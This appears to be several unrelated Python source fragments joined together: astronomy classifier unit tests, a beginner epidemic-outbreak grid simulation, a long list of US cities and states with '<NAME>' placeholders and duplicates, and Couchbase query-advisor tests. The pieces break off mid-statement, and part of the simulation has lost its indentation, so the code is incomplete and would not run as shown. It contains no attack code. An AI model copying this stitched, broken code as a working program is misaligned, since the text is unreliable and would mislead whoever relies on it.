    actual = self.classifier.identify_is_before_first_acc()
    npt.assert_allclose( expected, actual )
########################################################################
def test_get_cumulative_time_in_other_gal( self ):
    '''Test that we can correctly get the cumulative time spent in another galaxy.

    With a uniform dt of 51 (units per the classifier's time arrays), each
    expected entry is 51 times the number of True is_in_other_gal columns
    at or to the right of that position (earlier snapshots).
    '''
    # Test Data
    self.classifier.is_in_other_gal = np.array([
        [ 1, 0, 1, 0, 0, ],
        [ 0, 1, 1, 1, 0, ],
        [ 1, 1, 1, 0, 0, ],
    ]).astype( bool )
    self.classifier.dt = np.array([
        [ 51., 51., 51., 51., ],
        [ 51., 51., 51., 51., ],
        [ 51., 51., 51., 51., ],
    ])
    expected = np.array([
        [ 102., 51., 51., 0, ],
        [ 153., 153., 102., 51., ],
        [ 153, 102., 51., 0, ],
    ])
    actual = self.classifier.get_cumulative_time_in_other_gal()
    npt.assert_allclose( expected, actual, )
########################################################################
def test_time_in_other_gal_before_acc( self ):
    '''Total time spent in another galaxy before first accretion, using
    real snapshot spacings from get_time_difference().  The 2.404 value
    was computed externally (NED cosmology calculator, per the comment
    below); tolerance is relaxed accordingly.
    '''
    # Prerequisites
    self.classifier.dt = self.classifier.get_time_difference()
    self.classifier.is_before_first_acc = np.array([
        [ 0, 1, 1, 1, ], # Merger, except in early snapshots
        [ 0, 0, 0, 0, ], # Always part of main galaxy
        [ 0, 0, 1, 1, ], # CGM -> main galaxy -> CGM
    ]).astype( bool )
    self.classifier.is_in_other_gal = np.array([
        [ 0, 1, 1, 0, 0, ], # Merger, except in early snapshots
        [ 0, 0, 0, 0, 0, ], # Always part of main galaxy
        [ 0, 0, 0, 0, 0, ], # CGM -> main galaxy -> CGM
    ]).astype( bool )
    # Calculated using NED cosmology calculator
    expected = np.array([
        2.404, # Merger, except in early snapshots
        0., # Always part of main galaxy
        0., # CGM -> main galaxy -> CGM
    ])
    actual = self.classifier.get_time_in_other_gal_before_acc()
    npt.assert_allclose( expected, actual, rtol=1e-3 )
########################################################################
def test_get_time_in_other_gal_before_acc_during_interval( self ):
| |
#Classes Challenge 40: Epidemic Outbreak GUI App
import math
import random
import tkinter
class Simulation():
    """A class to control a simulation and facilitate the spread of a disease.

    All parameters are gathered interactively from stdin; the population is
    rounded to a perfect square so it can be drawn as a grid.
    """
    def __init__(self):
        """Initialize attributes by prompting the user for every parameter."""
        self.day_number = 1  # simulation clock, starts on day 1
        #Get simulation initial conditions from the user
        #Population size must be a perfect square for this program
        print("To simulate an epidemic outbreak, we must know the population size.")
        self.population_size = int(input("---Enter the population size: "))
        #Convert users population size to nearest perfect square for visual purposes
        root = math.sqrt(self.population_size) #For example, if population_size is 79, root = 8.8881
        #User did not enter a perfect square for the population
        if int(root + .5)**2 != self.population_size: # int(8.881 +.5)**2 = int(9.3881)**2 = 9**2 = 81 != 79
            root = round(root, 0) # round(8.881, 0) = 9.0
            self.grid_size = int(root) #grid_size = 9
            self.population_size = self.grid_size**2 #population_size = 9*9 = 81 the closest PERFECT SQUARE TO 79
            print("Rounding population size to " + str(self.population_size) + " for visual purposes.")
        #The user did enter a perfect square for the population
        else:
            self.grid_size = int(math.sqrt(self.population_size))
        print("\nWe must first start by infecting a portion of the population.")
        self.infection_percent = float(input("---Enter the percentage (0-100) of the population to initially infect: "))
        self.infection_percent /= 100  # stored as a 0-1 fraction
        print("\nWe must know the risk a person has to contract the disease when exposed.")
        self.infection_probability = float(input("---Enter the probability (0-100) that a person gets infected when exposed to the disease: "))
        # NOTE(review): unlike infection_percent, this stays on the 0-100
        # scale; Person.infect compares it against a 0-100 random draw.
        print("\nWe must know how long the infection will last when exposed.")
        self.infection_duration = int(input("---Enter the duration (in days) of the infection: "))
        print("\nWe must know the mortality rate of those infected.")
        self.mortality_rate = float(input("---Enter the mortality rate (0-100) of the infection: "))
        # mortality_rate is also kept on the 0-100 scale as entered.
        print("\nWe must know how long to run the simulation.")
        self.sim_days = int(input("---Enter the number of days to simulate: "))
class Person():
    """Models one member of the population and tracks their health state."""

    def __init__(self):
        """A person starts alive, healthy, and with no infection history."""
        self.is_infected = False
        self.is_dead = False
        self.days_infected = 0

    def infect(self, simulation):
        """Possibly infect this person: a 0-100 roll below the simulation's
        infection probability means the exposure took hold."""
        if random.randint(0, 100) < simulation.infection_probability:
            self.is_infected = True

    def heal(self):
        """Clear the infection and reset the infected-day counter."""
        self.is_infected = False
        self.days_infected = 0

    def die(self):
        """Mark this person as dead."""
        self.is_dead = True

    def update(self, simulation):
        """Advance this person by one day.

        A living, infected person accrues one infected day, may die on a
        mortality roll, and otherwise heals once the infection has lasted
        the configured duration.
        """
        # Dead or healthy people need no daily processing.
        if self.is_dead or not self.is_infected:
            return
        self.days_infected += 1
        # Mortality roll happens every infected day.
        if random.randint(0, 100) < simulation.mortality_rate:
            self.die()
        elif self.days_infected == simulation.infection_duration:
            self.heal()
class Population():
"""A class to model a whole population of Person objects"""
def __init__(self, simulation):
"""Initialize attributes"""
#This will be a list of N lists, where N is the simulation grid size.
#Each list within the list will represent a row in an NxN grid.
#Each element of the row will represent an individual Person object.
#Each of these lists will hold N Person objects and there will be N lists.
self.population = [] #A list to hold all Persons in the population.
#Loop through the needed number of rows
for i in range(simulation.grid_size):
row = []
#Loop through the needed number of Person objects for each row
for j in range(simulation.grid_size):
person = Person()
row.append(person)
#The entire row is complete, append it to the population
self.population.append(row)
def initial_infection(self, simulation):
"""Infect an initial portion of the population based on initial conditions of the sim"""
#Infect the infection_percent*population_size gives the total number to infect
#Round to 0 decimals and cast to int so it can be used in a loop.
infected_count = int(round(simulation.infection_percent*simulation.population_size, 0))
infections = 0
#Infect the population until you have infected the correct starting amount
while infections < infected_count:
#x is a random row in the population, y is a random person in the random row
#self.population[x][y] represents a random person in the population list
x = random.randint(0, simulation.grid_size - 1)
y = random.randint(0, simulation.grid_size - 1)
#If the person is not infected, infect them!
if not self.population[x][y].is_infected:
self.population[x][y].is_infected = True
self.population[x][y].days_infected = 1
infections += 1
def spread_infection(self, simulation):
"""Spread the infection in a 2D array to all adjacent people to a given person.
A given person in the population attribute is referenced as self.population[i][j]
A person to the right of the given person is referenced as self.population[i][j+1]
A person to the left of the given person is referenced as self.population[i][j-1]
A person below the given person is referenced as self.population[i+1][j]
A person above the given person is referenced as self.population[i-1][j]"""
#Loop through all rows of the population
for i in range(simulation.grid_size):
#Loop through all of the Person objects in a given row
for j in range(simulation.grid_size):
#Check to see if this given person self.population[i][j] is not dead
if self.population[i][j].is_dead == False:
#Check to see if we need to infect this person.
#We will try infect the given person if an adjacent person is already infected
#If i == 0, we are in the first row so, we can't look above
if i == 0:
#If j == 0, we are in the first column, so we can't look left.
if j == 0:
if self.population[i][j+1].is_infected or self.population[i+1][j].is_infected:
self.population[i][j].infect(simulation)
#If we are in the last column, we can't look right
elif j == simulation.grid_size-1:
if self.population[i][j-1].is_infected or self.population[i+1][j].is_infected:
self.population[i][j].infect(simulation)
#If we are in any other column, we can look left, right, or below
else:
if self.population[i][j-1].is_infected or self.population[i][j+1].is_infected or self.population[i+1][j].is_infected:
self.population[i][j].infect(simulation)
#If i == simulation.grid_size -1 we are in the last row, so we can't look below
elif i == simulation.grid_size-1:
#If j == 0, we are in the first column, so we can't look left.
if j == 0:
if self.population[i][j+1].is_infected or self.population[i-1][j].is_infected:
self.population[i][j].infect(simulation)
#If we are in the last column, we can't look right
elif j == simulation.grid_size-1:
if self.population[i][j-1].is_infected or self.population[i-1][j].is_infected:
self.population[i][j].infect(simulation)
#If we are in any other column, we can look left, right, or above
else:
if self.population[i][j-1].is_infected or self.population[i][j+1].is_infected or self.population[i-1][j].is_infected:
self.population[i][j].infect(simulation)
#Otherwise, we are in a row in between, we can look left, right, below or above
else:
#If j == 0, we are in the first column, so we can't look left.
if j == 0:
if self.population[i][j+1].is_infected or self.population[i+1][j].is_infected or self.population[i-1][j].is_infected:
self.population[i][j].infect(simulation)
#If we are in the last column, we can't look right
elif j == simulation.grid_size-1:
if self.population[i][j-1].is_infected or self.population[i+1][j].is_infected or self.population[i-1][j].is_infected:
self.population[i][j].infect(simulation)
#If we are in any other column, we can look left, right, below, or above
else:
if self.population[i][j-1].is_infected or self.population[i][j+1].is_infected or self.population[i+1][j].is_infected or self.population[i-1][j].is_infected:
self.population[i][j].infect(simulation)
def update(self, simulation):
"""Update the whole population by updating each individual Person"""
simulation.day_number += 1
#Loop through the population to access each row
for row in self.population:
#Loop through the row to update each Person
for person in row:
person.update(simulation)
def display_statistics(self, simulation):
"""Display the statistics of the population"""
#Initialize values
total_infected_count = 0
total_death_count = 0
#Loop through the population to access each row
for row in self.population:
#Loop through the row to access each person
for person in row:
#Person is infected
if person.is_infected:
total_infected_count += 1
#Person is dead
if person.is_dead:
total_death_count += 1
#Calculate percentage of population that is infected and dead
infected_percent = round(100*(total_infected_count/simulation.population_size), 4)
death_percent = round(100*(total_death_count/simulation.population_size), 4)
#Statistics summary
print("\n-----Day # " + str(simulation.day_number) + "-----")
print("Percentage of Population Infected: " + str(infected_percent) + "%")
print("Percentage of Population Dead: " + str(death_percent) + "%")
print("Total People Infected: " + str(total_infected_count) + " / " + | |
'Colorado'},
{'city': 'Cranford', 'state': 'New Jersey'},
{'city': 'Cranston', 'state': 'Rhode Island'},
{'city': 'Crawford', 'state': 'New York'},
{'city': 'Crawfordsville', 'state': 'Indiana'},
{'city': 'Cresskill', 'state': 'New Jersey'},
{'city': 'Crest Hill', 'state': 'Illinois'},
{'city': 'Crestline', 'state': 'California'},
{'city': 'Creston', 'state': 'Iowa'},
{'city': 'Crestview', 'state': 'Florida'},
{'city': 'Crestwood', 'state': 'Illinois'},
{'city': 'Crestwood', 'state': 'Missouri'},
{'city': 'Crestwood Village', 'state': 'New Jersey'},
{'city': 'Crete', 'state': 'Nebraska'},
{'city': 'Crete', 'state': 'Illinois'},
{'city': 'Creve Coeur', 'state': 'Missouri'},
{'city': 'Crockett', 'state': 'Texas'},
{'city': 'Crofton', 'state': 'Maryland'},
{'city': 'Cromwell', 'state': 'Connecticut'},
{'city': 'Crookston', 'state': 'Minnesota'},
{'city': 'Cross Lanes', 'state': 'West Virginia'},
{'city': 'Crossett', 'state': 'Arkansas'},
{'city': 'Crossville', 'state': 'Tennessee'},
{'city': 'Croton-on-Hudson', 'state': 'New York'},
{'city': 'Crowley', 'state': 'Texas'},
{'city': 'Crowley', 'state': 'Louisiana'},
{'city': 'Crown Point', 'state': 'Indiana'},
{'city': 'Croydon', 'state': 'Pennsylvania'},
{'city': 'Crystal', 'state': 'Minnesota'},
{'city': 'Crystal City', 'state': 'Texas'},
{'city': 'Crystal Lake', 'state': 'Illinois'},
{'city': 'Cudahy', 'state': 'California'},
{'city': 'Cudahy', 'state': 'Wisconsin'},
{'city': 'Cuero', 'state': 'Texas'},
{'city': 'Cullman', 'state': 'Alabama'},
{'city': 'Culpeper', 'state': 'Virginia'},
{'city': 'Culver City', 'state': 'California'},
{'city': 'Cumberland', 'state': 'Maine'},
{'city': 'Cumberland', 'state': 'Maryland'},
{'city': 'Cumberland', 'state': 'Rhode Island'},
{'city': 'Cumberland Hill', 'state': 'Rhode Island'},
{'city': 'Cupertino', 'state': 'California'},
{'city': 'Cushing', 'state': 'Oklahoma'},
{'city': 'Cutler', 'state': 'Florida'},
{'city': 'Cutler Ridge', 'state': 'Florida'},
{'city': 'Cutlerville', 'state': 'Michigan'},
{'city': 'Cuyahoga Falls', 'state': 'Ohio'},
{'city': 'Cynthiana', 'state': 'Kentucky'},
{'city': 'Cypress', 'state': 'California'},
{'city': 'Cypress Gardens', 'state': 'Florida'},
{'city': 'Cypress Lake', 'state': 'Florida'},
{'city': 'D’Iberville', 'state': 'Mississippi'},
{'city': 'Dade City', 'state': 'Florida'},
{'city': 'Dale City', 'state': 'Virginia'},
{'city': 'Dalhart', 'state': 'Texas'},
{'city': 'Dallas', 'state': 'Texas'},
{'city': 'Dallas', 'state': 'Oregon'},
{'city': 'Dalton', 'state': 'Massachusetts'},
{'city': 'Dalton', 'state': 'Georgia'},
{'city': 'Daly City', 'state': 'California'},
{'city': 'Damascus', 'state': 'Maryland'},
{'city': 'Dana Point', 'state': 'California'},
{'city': 'Danbury', 'state': 'Connecticut'},
{'city': 'Danbury', 'state': 'Connecticut'},
{'city': 'Dania Beach', 'state': 'Florida'},
{'city': 'Danvers', 'state': 'Massachusetts'},
{'city': 'Danvers', 'state': 'Massachusetts'},
{'city': 'Danville', 'state': 'California'},
{'city': 'Danville', 'state': 'Kentucky'},
{'city': 'Danville', 'state': 'Indiana'},
{'city': 'Danville', 'state': 'Illinois'},
{'city': 'Danville', 'state': 'Virginia'},
{'city': 'Daphne', 'state': 'Alabama'},
{'city': 'Darby', 'state': 'Pennsylvania'},
{'city': 'Darby Township', 'state': 'Pennsylvania'},
{'city': 'Darien', 'state': 'Connecticut'},
{'city': 'Darien', 'state': 'Connecticut'},
{'city': 'Darien', 'state': 'Illinois'},
{'city': 'Darlington', 'state': 'South Carolina'},
{'city': 'Darnestown', 'state': 'Maryland'},
{'city': 'Dartmouth', 'state': 'Massachusetts'},
{'city': 'Davenport', 'state': 'Iowa'},
{'city': 'Davidson', 'state': 'North Carolina'},
{'city': 'Davie', 'state': 'Florida'},
{'city': 'Davis', 'state': 'California'},
{'city': 'Dayton', 'state': 'Ohio'},
{'city': 'Dayton', 'state': 'New Jersey'},
{'city': 'Dayton', 'state': 'Tennessee'},
{'city': 'Daytona Beach', 'state': 'Florida'},
{'city': '<NAME>', 'state': 'Florida'},
{'city': 'De Land', 'state': 'Florida'},
{'city': 'De Pere', 'state': 'Wisconsin'},
{'city': 'De Ridder', 'state': 'Louisiana'},
{'city': 'De Soto', 'state': 'Missouri'},
{'city': 'De Witt', 'state': 'New York'},
{'city': 'Dearborn', 'state': 'Michigan'},
{'city': 'Dearborn Heights', 'state': 'Michigan'},
{'city': 'Decatur', 'state': 'Indiana'},
{'city': 'Decatur', 'state': 'Illinois'},
{'city': 'Decatur', 'state': 'Georgia'},
{'city': 'Decatur', 'state': 'Alabama'},
{'city': 'Decorah', 'state': 'Iowa'},
{'city': 'Dedham', 'state': 'Massachusetts'},
{'city': 'Dedham', 'state': 'Massachusetts'},
{'city': 'Deer Park', 'state': 'New York'},
{'city': 'Deer Park', 'state': 'Texas'},
{'city': 'Deerfield', 'state': 'Illinois'},
{'city': 'Deerfield Beach', 'state': 'Florida'},
{'city': 'Deerpark', 'state': 'New York'},
{'city': 'Defiance', 'state': 'Ohio'},
{'city': 'DeForest', 'state': 'Wisconsin'},
{'city': 'DeKalb', 'state': 'Illinois'},
{'city': 'Del Aire', 'state': 'California'},
{'city': 'Del City', 'state': 'Oklahoma'},
{'city': 'Del Rio', 'state': 'Texas'},
{'city': 'Delafield', 'state': 'Wisconsin'},
{'city': 'Delafield', 'state': 'Wisconsin'},
{'city': 'Delano', 'state': 'California'},
{'city': 'Delavan', 'state': 'Wisconsin'},
{'city': 'Delaware', 'state': 'Ohio'},
{'city': 'Delhi', 'state': 'California'},
{'city': 'Delmar', 'state': 'New York'},
{'city': 'Delphos', 'state': 'Ohio'},
{'city': 'Delray Beach', 'state': 'Florida'},
{'city': 'Delta', 'state': 'Colorado'},
{'city': 'Deltona', 'state': 'Florida'},
{'city': 'Deming', 'state': 'New Mexico'},
{'city': 'Demopolis', 'state': 'Alabama'},
{'city': 'Denham Springs', 'state': 'Louisiana'},
{'city': 'Denison', 'state': 'Iowa'},
{'city': 'Denison', 'state': 'Texas'},
{'city': 'Dennis', 'state': 'Massachusetts'},
{'city': 'Dent', 'state': 'Ohio'},
{'city': 'Denton', 'state': 'Texas'},
{'city': 'Dentsville', 'state': 'South Carolina'},
{'city': 'Denver', 'state': 'Colorado'},
{'city': 'Depew', 'state': 'New York'},
{'city': 'Derby', 'state': 'Colorado'},
{'city': 'Derby', 'state': 'Connecticut'},
{'city': 'Derby', 'state': 'Connecticut'},
{'city': 'Derby', 'state': 'Kansas'},
{'city': 'Derry', 'state': 'New Hampshire'},
{'city': 'Derry', 'state': 'New Hampshire'},
{'city': 'Des Moines', 'state': 'Iowa'},
{'city': 'Des Moines', 'state': 'Washington'},
{'city': 'Des Peres', 'state': 'Missouri'},
{'city': 'Des Plaines', 'state': 'Illinois'},
{'city': 'Desert Hot Springs', 'state': 'California'},
{'city': 'DeSoto', 'state': 'Texas'},
{'city': 'Destin', 'state': 'Florida'},
{'city': 'Destrehan', 'state': 'Louisiana'},
{'city': 'Detroit', 'state': 'Michigan'},
{'city': 'Detroit Lakes', 'state': 'Minnesota'},
{'city': 'Devils Lake', 'state': 'North Dakota'},
{'city': 'Dewey-Humboldt', 'state': 'Arizona'},
{'city': 'Dexter', 'state': 'Missouri'},
{'city': 'Diamond Bar', 'state': 'California'},
{'city': 'Dickinson', 'state': 'North Dakota'},
{'city': 'Dickinson', 'state': 'Texas'},
{'city': 'Dickson', 'state': 'Tennessee'},
{'city': '<NAME>', 'state': 'Pennsylvania'},
{'city': 'Dighton', 'state': 'Massachusetts'},
{'city': 'Dillon', 'state': 'South Carolina'},
{'city': 'Dinuba', 'state': 'California'},
{'city': 'Discovery Bay', 'state': 'California'},
{'city': 'Dishman', 'state': 'Washington'},
{'city': 'Dix Hills', 'state': 'New York'},
{'city': 'Dixon', 'state': 'California'},
{'city': 'Dixon', 'state': 'Illinois'},
{'city': '<NAME>', 'state': 'New York'},
{'city': 'Dock Junction', 'state': 'Georgia'},
{'city': '<NAME>', 'state': 'Florida'},
{'city': 'Dodge City', 'state': 'Kansas'},
{'city': 'Dolton', 'state': 'Illinois'},
{'city': 'Donaldsonville', 'state': 'Louisiana'},
{'city': 'Donna', 'state': 'Texas'},
{'city': 'Doral', 'state': 'Florida'},
{'city': 'Doraville', 'state': 'Georgia'},
{'city': 'Dormont', 'state': 'Pennsylvania'},
{'city': 'Dothan', 'state': 'Alabama'},
{'city': 'Douglas', 'state': 'Arizona'},
{'city': 'Douglas', 'state': 'Georgia'},
{'city': 'Douglas', 'state': 'Massachusetts'},
{'city': 'Douglasville', 'state': 'Georgia'},
{'city': 'Dover', 'state': 'Delaware'},
{'city': 'Dover', 'state': 'New Hampshire'},
{'city': 'Dover', 'state': 'New York'},
{'city': 'Dover', 'state': 'New Jersey'},
{'city': 'Dover', 'state': 'Ohio'},
{'city': 'Dowagiac', 'state': 'Michigan'},
{'city': 'Downers Grove', 'state': 'Illinois'},
{'city': 'Downey', 'state': 'California'},
{'city': 'Downingtown', 'state': 'Pennsylvania'},
{'city': 'Doylestown', 'state': 'Pennsylvania'},
{'city': 'Dracut', 'state': 'Massachusetts'},
{'city': 'Draper', 'state': 'Utah'},
{'city': 'Drexel Heights', 'state': 'Arizona'},
{'city': 'Drexel Hill', 'state': 'Pennsylvania'},
{'city': 'Dr<NAME>', 'state': 'Georgia'},
{'city': 'Dry Run', 'state': 'Ohio'},
{'city': 'Dryden', 'state': 'New York'},
{'city': 'Du Quoin', 'state': 'Illinois'},
{'city': 'Duarte', 'state': 'California'},
{'city': 'Dublin', 'state': 'California'},
{'city': 'Dublin', 'state': 'Georgia'},
{'city': 'Dublin', 'state': 'Ohio'},
{'city': 'DuBois', 'state': 'Pennsylvania'},
{'city': 'Dubuque', 'state': 'Iowa'},
{'city': 'Dudley', 'state': 'Massachusetts'},
{'city': 'Duluth', 'state': 'Minnesota'},
{'city': 'Duluth', 'state': 'Georgia'},
{'city': 'Dumas', 'state': 'Texas'},
{'city': 'Dumbarton', 'state': 'Virginia'},
{'city': 'Dumont', 'state': 'New Jersey'},
{'city': 'Dunbar', 'state': 'West Virginia'},
{'city': 'Duncan', 'state': 'Oklahoma'},
{'city': 'Duncanville', 'state': 'Texas'},
{'city': 'Dundalk', 'state': 'Maryland'},
{'city': 'Dunedin', 'state': 'Florida'},
{'city': 'Dunellen', 'state': 'New Jersey'},
{'city': 'Dunkirk', 'state': 'New York'},
{'city': 'Dunmore', 'state': 'Pennsylvania'},
{'city': 'Dunn', 'state': 'North Carolina'},
{'city': 'Dunn Loring', 'state': 'Virginia'},
{'city': 'Dunwoody', 'state': 'Georgia'},
{'city': 'Duquesne', 'state': 'Pennsylvania'},
{'city': 'Durango', 'state': 'Colorado'},
{'city': 'Durant', 'state': 'Oklahoma'},
{'city': 'Durham', 'state': 'Connecticut'},
{'city': 'Durham', 'state': 'North Carolina'},
{'city': 'Durham', 'state': 'New Hampshire'},
{'city': 'Durham', 'state': 'New Hampshire'},
{'city': 'Duxbury', 'state': 'Massachusetts'},
{'city': 'Dyer', 'state': 'Indiana'},
{'city': 'Dyersburg', 'state': 'Tennessee'},
{'city': 'Eagan', 'state': 'Minnesota'},
{'city': 'Eagle', 'state': 'Idaho'},
{'city': 'Eagle Mountain', 'state': 'Texas'},
{'city': 'Eagle Pass', 'state': 'Texas'},
{'city': 'Earlimart', 'state': 'California'},
{'city': 'Easley', 'state': 'South Carolina'},
{'city': 'East Alton', 'state': 'Illinois'},
{'city': 'East Aurora', 'state': 'New York'},
{'city': 'East Bethel', 'state': 'Minnesota'},
{'city': 'East Brainerd', 'state': 'Tennessee'},
{'city': 'East Bridgewater', 'state': 'Massachusetts'},
{'city': 'East Brunswick', 'state': 'New Jersey'},
{'city': 'East Chicago', 'state': 'Indiana'},
{'city': 'East Cleveland', 'state': 'Ohio'},
{'city': 'East Compton', 'state': 'California'},
{'city': 'East Falmouth', 'state': 'Massachusetts'},
{'city': 'East Fishkill', 'state': 'New York'},
{'city': 'East Foothills', 'state': 'California'},
{'city': 'East Glenville', 'state': 'New York'},
{'city': 'East Grand Forks', 'state': 'Minnesota'},
{'city': 'East Grand Rapids', 'state': 'Michigan'},
{'city': 'East Greenbush', 'state': 'New York'},
{'city': 'East Greenwich', 'state': 'Rhode Island'},
{'city': 'East Haddam', 'state': 'Connecticut'},
{'city': 'East Hampton', 'state': 'Connecticut'},
{'city': 'East Hampton', 'state': 'New York'},
{'city': 'East Hartford', 'state': 'Connecticut'},
{'city': 'East Hartford', 'state': 'Connecticut'},
{'city': 'East Haven', 'state': 'Connecticut'},
{'city': 'East Haven', 'state': 'Connecticut'},
{'city': 'East Hemet', 'state': 'California'},
{'city': 'East Highland Park', 'state': 'Virginia'},
{'city': 'East Hill-Meridian', 'state': 'Washington'},
{'city': 'East Hills', 'state': 'New York'},
{'city': 'East Islip', 'state': 'New York'},
{'city': 'East La Mirada', 'state': 'California'},
{'city': 'East Lake', 'state': 'Florida'},
{'city': 'East Lansing', 'state': 'Michigan'},
{'city': 'East Liverpool', 'state': 'Ohio'},
{'city': 'East Longmeadow', 'state': 'Massachusetts'},
{'city': 'East Los Angeles', 'state': 'California'},
{'city': 'East Lyme', 'state': 'Connecticut'},
{'city': 'East Massapequa', 'state': 'New York'},
{'city': 'East Meadow', 'state': 'New York'},
{'city': 'East Millcreek', 'state': 'Utah'},
{'city': 'East Moline', 'state': 'Illinois'},
{'city': 'East Norriton', 'state': 'Pennsylvania'},
{'city': 'East Northport', 'state': | |
close_txn:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '15m'})", server=self.master)
session = start['results'][0]['$1']['session']
# Run query in transaction
results = self.run_cbq_query(query="BEGIN WORK", server=self.master)
query_params = {'txid': results['results'][0]['txid']}
results = self.run_cbq_query(query=query1, query_params=query_params, server=self.master)
results = self.run_cbq_query(query=rollback_or_commit, query_params=query_params, server=self.master)
# Stop and check session advise
stop = self.run_cbq_query(query="SELECT ADVISOR({{'action':'stop', 'session':'{0}'}}) as Stop".format(session), server=self.master)
get = self.run_cbq_query(query="SELECT ADVISOR({{'action':'get', 'session':'{0}'}}) as Get".format(session), server=self.master)
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], query1)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_negative_txn(self):
results = self.run_cbq_query(query="BEGIN WORK", server=self.master)
query_params = {'txid': results['results'][0]['txid']}
error = "advisor function is not supported within the transaction"
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '15m'})", query_params=query_params, server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_session_query_count(self):
query_lyon=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
query_grenoble=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "grenoble" AND country = "France"'
query_nice=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "nice" AND country = "France"'
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '15m', 'query_count': 6})", server=self.master)
session = start['results'][0]['$1']['session']
# Run 9 queries
results = self.run_cbq_query(query=query_lyon, server=self.master)
results = self.run_cbq_query(query=query_grenoble, server=self.master)
results = self.run_cbq_query(query=query_nice, server=self.master)
results = self.run_cbq_query(query=query_lyon, server=self.master)
results = self.run_cbq_query(query=query_grenoble, server=self.master)
results = self.run_cbq_query(query=query_lyon, server=self.master)
results = self.run_cbq_query(query=query_nice, server=self.master)
results = self.run_cbq_query(query=query_grenoble, server=self.master)
results = self.run_cbq_query(query=query_nice, server=self.master)
# Stop and check session advise. We should only see 6 queries count = 3*lyon + 2*grenoble + 1*nice
stop = self.run_cbq_query(query="SELECT ADVISOR({{'action':'stop', 'session':'{0}'}}) as Stop".format(session), server=self.master)
get = self.run_cbq_query(query="SELECT ADVISOR({{'action':'get', 'session':'{0}'}}) as Get".format(session), server=self.master)
queries_count = dict()
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for query in index['statements']:
queries_count[query['statement']] = query['run_count']
self.assertEqual(queries_count[query_lyon], 3)
self.assertEqual(queries_count[query_grenoble], 2)
self.assertEqual(queries_count[query_nice], 1)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_get_active_session(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '5000s', 'query_count': 2 })", server=self.master)
session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Get session
get = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'get', 'session': '{0}'}}) as Get".format(session), server=self.master)
self.assertEqual(get['results'][0]['Get'], [])
# Abort session
abort = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'abort', 'session': '{0}'}})".format(session), server=self.master)
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", server=self.master)
self.assertEqual(results['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_negative_query_syntax_error(self):
query_syntax = f'SELECT airportname FROM `{self.bucket_name}` WERE type = \\"airport\\"'
error = "syntax error - at type"
try:
advise = self.run_cbq_query(query=f"SELECT ADVISOR(\"{query_syntax}\") as Advisor", server=self.master)
self.assertEqual(advise["results"][0]["Advisor"]["errors"][0]["error"], error)
self.assertEqual(advise["results"][0]["Advisor"]["errors"][0]["run_count"], 1)
self.assertEqual(advise["results"][0]["Advisor"]["errors"][0]["statement"], query_syntax.replace('\\',''))
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_negative_invalid_arg(self):
query = "SELECT ADVISOR({'action': 'start', 'duration': '10s', 'invalid': 10});"
error = "Error evaluating projection. - cause: Invalid arguments to Advisor() function: [invalid]"
try:
results = self.run_cbq_query(query=query, server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_missing_arg(self):
query = "SELECT ADVISOR({'action': 'start', 'response': '10s'});"
error = "Error evaluating projection. - cause: advisor() not valid argument for 'duration'"
try:
results = self.run_cbq_query(query=query, server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_array(self):
query=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
error = "Number of arguments to function ADVISOR must be 1. - at "
try:
results = self.run_cbq_query(query=f"SELECT ADVISOR('{query}','{query}')", server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_invalid_value(self):
invalid_actions = [ \
{'cmd': {'action':'start', 'duration':'two'}, 'msg': 'Error evaluating projection. - cause: time: invalid duration two'}, \
{'cmd': {'action':'start', 'duration':'1hr'}, 'msg': 'Error evaluating projection. - cause: time: unknown unit hr in duration 1hr'}, \
{'cmd': {'action':'start', 'duration':'1h', 'response':'nul'}, 'msg': 'Error evaluating projection. - cause: time: invalid duration nul'}, \
{'cmd': {'action':'start', 'duration':'1h', 'response':'1sec'}, 'msg': 'Error evaluating projection. - cause: time: unknown unit sec in duration 1sec'}, \
{'cmd': {'action':'start', 'duration':'1h', 'query_count':'ten'}, 'msg': 'Error evaluating projection. - cause: advisor() not valid argument for \'query_count\''}, \
{'cmd': {'action':'start', 'duration':'1h', 'profile':9999}, 'msg': 'Error evaluating projection. - cause: advisor() not valid argument for \'profile\''} ]
for action in invalid_actions:
try:
